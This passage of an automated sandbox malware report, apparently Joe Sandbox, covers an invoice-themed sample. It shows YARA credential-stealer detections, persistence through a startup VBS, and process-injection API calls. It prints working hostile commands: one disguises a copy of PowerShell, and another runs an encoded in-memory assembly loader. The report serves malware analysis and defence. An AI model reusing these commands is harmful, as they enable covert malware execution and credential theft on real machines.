                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:09:16:06
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:09:16:10
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                              Imagebase:0x10000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1452651093.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:09:16:20
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
                                                                              Imagebase:0x7ff783f40000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:11:14:05
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
                                                                              Imagebase:0x7ff783f40000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:11:14:06
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y
                                                                              Imagebase:0x7ff6692d0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:11:14:06
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:11:14:09
                                                                              Start date:31/10/2024
                                                                              Path:C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                                                                              Imagebase:0x340000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:11:14:09
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:11:14:11
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                              Imagebase:0xc10000
                                                                              File size:42'064 bytes
                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1617686351.0000000003324000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:5.4%
                                                                                Dynamic/Decrypted Code Coverage:88%
                                                                                Signature Coverage:12%
                                                                                Total number of Nodes:50
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 32607 a035480 32608 a0354cf NtProtectVirtualMemory 32607->32608 32610 a035547 32608->32610 32641 a036fe0 32642 a037029 VirtualProtect 32641->32642 32644 a037096 32642->32644 32645 a0e5b68 32646 a0e5b81 32645->32646 32648 a0ed5b0 VirtualProtect 32646->32648 32647 a0e5ba8 32648->32647 32611 a0e9105 32612 a0e911e 32611->32612 32615 a0ed5b0 32612->32615 32617 a0ed5d7 32615->32617 32619 a0edab0 32617->32619 32620 a0edaf9 VirtualProtect 32619->32620 32622 a0e9149 32620->32622 32623 a036d08 32624 a036d51 NtResumeThread 32623->32624 32626 a036da8 32624->32626 32649 a038868 32651 a0388c4 32649->32651 32650 a0389bc CopyFileA 32652 a0389f5 32650->32652 32651->32650 32651->32651 32653 2f2d01c 32654 2f2d034 32653->32654 32655 2f2d08f 32654->32655 32657 a0ee198 32654->32657 32658 a0ee1f1 32657->32658 32661 a0ee728 32658->32661 32659 a0ee226 32662 a0ee755 32661->32662 32663 a0ed5b0 VirtualProtect 32662->32663 32665 a0ee8eb 32662->32665 32664 a0ee8dc 32663->32664 32664->32659 32665->32659 32627 a036990 32628 a0369d4 VirtualAllocEx 32627->32628 32630 a036a4c 32628->32630 32631 a036430 32632 a036479 Wow64SetThreadContext 32631->32632 32634 a0364f1 32632->32634 32666 a035c70 32668 a035cf0 CreateProcessA 32666->32668 32669 a035eec 32668->32669 32670 a036af0 32671 a036b3c WriteProcessMemory 32670->32671 32673 a036bd5 32671->32673 32674 a0eec78 32675 a0eecbc VirtualAlloc 32674->32675 32677 a0eed29 32675->32677

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 525 a031d70-a031d91 526 a031d93 525->526 527 a031d98-a031e15 525->527 526->527 618 a031e1b call a032911 527->618 619 a031e1b call a032920 527->619 532 a031e21-a031e5e 534 a031e60-a031e6b 532->534 535 a031e6d 532->535 536 a031e77-a031f92 534->536 535->536 547 a031fa4-a031fcf 536->547 548 a031f94-a031f9a 536->548 549 a0327f3-a03280f 547->549 548->547 550 a032815-a032830 549->550 551 a031fd4-a032152 549->551 562 a032164-a032300 551->562 563 a032154-a03215a 551->563 574 a032302-a032306 562->574 575 a032365-a03236f 562->575 563->562 577 a032308-a032309 574->577 578 a03230e-a032360 574->578 576 a0325cc-a0325eb 575->576 580 a0325f1-a03261b 576->580 581 a032374-a0324d5 576->581 579 a032671-a0326dc 577->579 578->579 597 a0326ee-a032739 579->597 598 a0326de-a0326e4 579->598 587 a03266e-a03266f 580->587 588 a03261d-a03266b 580->588 611 a0325c5-a0325c6 581->611 612 a0324db-a0325c2 581->612 587->579 588->587 600 a0327d8-a0327f0 597->600 601 a03273f-a0327d7 597->601 598->597 600->549 601->600 611->576 612->611 618->532 619->532
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: fq$8
                                                                                • API String ID: 0-1651916650
                                                                                • Opcode ID: 1b683fbeb2127b1e74e69604326ba9b3ae6d93eeb9fae06fcdd3cedba5b7fd06
                                                                                • Instruction ID: 14ec40f09ee3d89f7f18c1425399915ec7d1e3a58cf9461152a38b6ad1a05e26
                                                                                • Opcode Fuzzy Hash: 1b683fbeb2127b1e74e69604326ba9b3ae6d93eeb9fae06fcdd3cedba5b7fd06
                                                                                • Instruction Fuzzy Hash: B262C575E002298FDB64DF69C850AD9B7B1FF89310F1186EAD909A7354DB34AE81CF90
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A035535
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: f255037aece53ec9ddf8b1e55b0aea0d157c724c061bf8e712ef98b6d1c897dc
                                                                                • Instruction ID: e0719c88313f5d3a6abfa62a24a75ac776b7e6d271b295272f849ba5475879d1
                                                                                • Opcode Fuzzy Hash: f255037aece53ec9ddf8b1e55b0aea0d157c724c061bf8e712ef98b6d1c897dc
                                                                                • Instruction Fuzzy Hash: AB4188B9D052589FCF14CFAAD980ADEFBB1BB09310F14942AE814B7310D735A942CF68
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A035535
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: 1436fd3ebcc631458847f9607ef6bdec7a77cf3d9203181d1649710db67980f9
                                                                                • Instruction ID: bc0cd7456e8c7a8076860b55c152179f8dcc5c2fe7cbfff7802b96112c413eed
                                                                                • Opcode Fuzzy Hash: 1436fd3ebcc631458847f9607ef6bdec7a77cf3d9203181d1649710db67980f9
                                                                                • Instruction Fuzzy Hash: E04197B9D0125C9FCF14CFAAD980ADEFBB5BB09310F14902AE818B7210D735A941CF68
                                                                                APIs
                                                                                • NtResumeThread.NTDLL(?,?), ref: 0A036D96
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 7e6e605af2ef00ef157e6779faecbf0b55845aa810ed903b7c0bc5c7cdb3eb16
                                                                                • Instruction ID: b046db895c999ea8c9d099863f10aa0920d06e6f4221649bc9697e6a08aa4e17
                                                                                • Opcode Fuzzy Hash: 7e6e605af2ef00ef157e6779faecbf0b55845aa810ed903b7c0bc5c7cdb3eb16
                                                                                • Instruction Fuzzy Hash: 8E31EEB5D01218AFDB24DFA9D980AAEFBF4BF48310F14842AE805B7200C7796901CF99
                                                                                APIs
                                                                                • NtResumeThread.NTDLL(?,?), ref: 0A036D96
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 356ef36bb75fbdc92bf7eacaec167d49fd0cbf8b5e5e82700c210303fee663e2
                                                                                • Instruction ID: 05477089624ae4512f0dd7a0008ac126088425f741932f60b2b63b4f4558a5c5
                                                                                • Opcode Fuzzy Hash: 356ef36bb75fbdc92bf7eacaec167d49fd0cbf8b5e5e82700c210303fee663e2
                                                                                • Instruction Fuzzy Hash: B4318AB5D01218AFDF14CFAAD980A9EFBF5BF49310F14942AE815B7200C775A945CFA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cb33ec615091896cf4dbd0bf066bfc64ab9b5d656dfa3430151ee21cf95366af
                                                                                • Instruction ID: c8d91b687de833e83c8a45e4ac0c517717b226e08e081884d1db5b3edd8106b2
                                                                                • Opcode Fuzzy Hash: cb33ec615091896cf4dbd0bf066bfc64ab9b5d656dfa3430151ee21cf95366af
                                                                                • Instruction Fuzzy Hash: B7C1DEB5E0120DEFDB54CFA9D484BADBBF6FB49300F10806AE80AAB251DB745985CF04
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3b262682d536624af4caafe6ba3f83e98c833480357323ccddb9f7f862ea634b
                                                                                • Instruction ID: a354c033eb6a47cfaf668ebb4177579c0a256aa659b1f6228e3e3ec77f0f1eea
                                                                                • Opcode Fuzzy Hash: 3b262682d536624af4caafe6ba3f83e98c833480357323ccddb9f7f862ea634b
                                                                                • Instruction Fuzzy Hash: 83C1DEB5E01209DFDB54CFA9D884B9DBBF6FB89300F14806AE80AAB255DB745985CF04
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 647afe773a4384addaaef3deb07d9dedebadd81926ae8d78f946698119ceec3e
                                                                                • Instruction ID: 4a6451a36aa8d2a2ef600db05fd391b2983a64c5474c5d87a5852b271a40ee49
                                                                                • Opcode Fuzzy Hash: 647afe773a4384addaaef3deb07d9dedebadd81926ae8d78f946698119ceec3e
                                                                                • Instruction Fuzzy Hash: 3A819C71A04208CFEF28CF59C484BAAB7B2FB84380F19C56BD6169B655C338ED46CB51
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f7742f8ccb667f61f70652e336706d033b43ed7adff412b470a68d6d1912398b
                                                                                • Instruction ID: b4ddff588019c6eab12bc1afbfcaf3f3624e731b358e8beefa5e67e68e704a64
                                                                                • Opcode Fuzzy Hash: f7742f8ccb667f61f70652e336706d033b43ed7adff412b470a68d6d1912398b
                                                                                • Instruction Fuzzy Hash: 73614F35B00204DFEB04CF69D599BAABBF2EF88351F258469E6069B365DB34DC41CB50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 76d00f0-76d0111 1 76d0264-76d0284 0->1 2 76d0117-76d011c 0->2 9 76d02b4-76d02b6 1->9 10 76d0286-76d02ab 1->10 3 76d011e-76d0124 2->3 4 76d0134-76d0140 2->4 6 76d0128-76d0132 3->6 7 76d0126 3->7 12 76d0214-76d021e 4->12 13 76d0146-76d0149 4->13 6->4 7->4 16 76d02ce-76d02d2 9->16 17 76d02b8-76d02be 9->17 14 76d02b1 10->14 15 76d0400-76d044b 10->15 21 76d022b-76d0231 12->21 22 76d0220-76d0228 12->22 13->12 20 76d014f-76d0156 13->20 14->9 38 76d0451-76d0456 15->38 39 76d05a0-76d05ee 15->39 18 76d02d8-76d02da 16->18 19 76d03b0-76d03ba 16->19 23 76d02c0 17->23 24 76d02c2-76d02cc 17->24 25 76d02dc-76d02f7 18->25 26 76d02f9 18->26 31 76d03bc-76d03c5 19->31 32 76d03c8-76d03ce 19->32 20->1 27 76d015c-76d0161 20->27 29 76d0237-76d0243 21->29 30 76d0233-76d0235 21->30 23->16 24->16 35 76d02fb-76d02fd 25->35 26->35 36 76d0179-76d017d 27->36 37 76d0163-76d0169 27->37 40 76d0245-76d0261 29->40 30->40 33 76d03d4-76d03e0 32->33 34 76d03d0-76d03d2 32->34 42 76d03e2-76d03fd 33->42 34->42 35->19 44 76d0303-76d0305 35->44 36->12 49 76d0183-76d01a0 36->49 45 76d016d-76d0177 37->45 46 76d016b 37->46 47 76d046e-76d0472 38->47 48 76d0458-76d045e 38->48 67 76d073b-76d075c 39->67 68 76d05f4-76d05f9 39->68 44->19 55 76d030b-76d0314 44->55 45->36 46->36 53 76d0478-76d047a 47->53 54 76d0550-76d055a 47->54 57 76d0460 48->57 58 76d0462-76d046c 48->58 94 76d01b8-76d0211 49->94 95 76d01a2-76d01a8 49->95 62 76d047c-76d0497 53->62 63 76d0499 53->63 59 76d055c-76d0565 54->59 60 76d0568-76d056e 54->60 55->19 87 76d031a-76d0336 55->87 57->47 58->47 70 76d0574-76d0580 60->70 71 76d0570-76d0572 60->71 75 76d049b-76d049d 62->75 63->75 91 76d078c 67->91 92 76d075e-76d076d 67->92 72 76d05fb-76d0601 68->72 73 76d0611-76d0615 68->73 78 76d0582-76d059d 70->78 71->78 79 76d0605-76d060f 72->79 80 76d0603 72->80 81 76d061b-76d061d 73->81 82 76d06e7-76d06f1 73->82 75->54 86 76d04a3-76d04a5 75->86 79->73 80->73 89 76d062d 81->89 90 76d061f-76d062b 81->90 96 76d06ff-76d0705 82->96 97 76d06f3-76d06fc 82->97 86->54 93 76d04ab-76d04b4 86->93 112 76d0338 87->112 113 76d033a-76d0346 87->113 99 76d062f-76d0631 89->99 90->99 103 76d081d-76d0822 91->103 104 76d0792-76d0798 91->104 101 76d076f-76d0785 92->101 102 76d07ce-76d07d8 92->102 93->54 127 76d04ba-76d04d6 93->127 106 76d01ac-76d01ae 95->106 107 76d01aa 95->107 109 76d070b-76d0717 96->109 110 76d0707-76d0709 96->110 99->82 114 76d0637-76d0639 99->114 101->91 118 76d07da-76d07de 102->118 119 76d07e1-76d07e7 102->119 103->104 115 76d079c-76d07a8 104->115 116 76d079a 104->116 106->94 107->94 120 76d0719-76d0738 109->120 110->120 121 76d0348-76d034a 112->121 113->121 114->82 124 76d063f-76d0643 114->124 126 76d07aa-76d07c8 115->126 116->126 128 76d07ed-76d07f9 119->128 129 76d07e9-76d07eb 119->129 136 76d0351-76d0353 121->136 124->82 133 76d0649-76d064b 124->133 126->102 147 76d04d8 127->147 148 76d04da-76d04e6 127->148 135 76d07fb-76d081a 128->135 129->135 137 76d064d-76d0653 133->137 138 76d0665-76d066c 133->138 143 76d036b-76d03ad 136->143 144 76d0355-76d035b 136->144 145 76d0655 137->145 146 76d0657-76d0663 137->146 153 76d0673-76d0675 138->153 150 76d035d 144->150 151 76d035f-76d0361 144->151 145->138 146->138 154 76d04e8-76d04f3 147->154 148->154 150->143 151->143 156 76d068d-76d06e4 153->156 157 76d0677-76d067d 153->157 164 76d050b-76d054d 154->164 165 76d04f5-76d04fb 154->165 160 76d067f 157->160 161 76d0681-76d0683 157->161 160->156 161->156 166 76d04fd 165->166 167 76d04ff-76d0501 165->167 166->164 167->164
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q
                                                                                • API String ID: 0-3653725761
                                                                                • Opcode ID: de0a2225dfac25fede0e7b5619d0922d4febc512488890703ebe981e76d657e0
                                                                                • Instruction ID: 015d7065976b439995242ae69a10af9d86d8c82223353ef71a98eb0f75547e3a
                                                                                • Opcode Fuzzy Hash: de0a2225dfac25fede0e7b5619d0922d4febc512488890703ebe981e76d657e0
                                                                                • Instruction Fuzzy Hash: 2D022AB1F15356DFDB258B75D8047AAB7A1AFC5210F24806BD906DB351EA31CC42CBA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
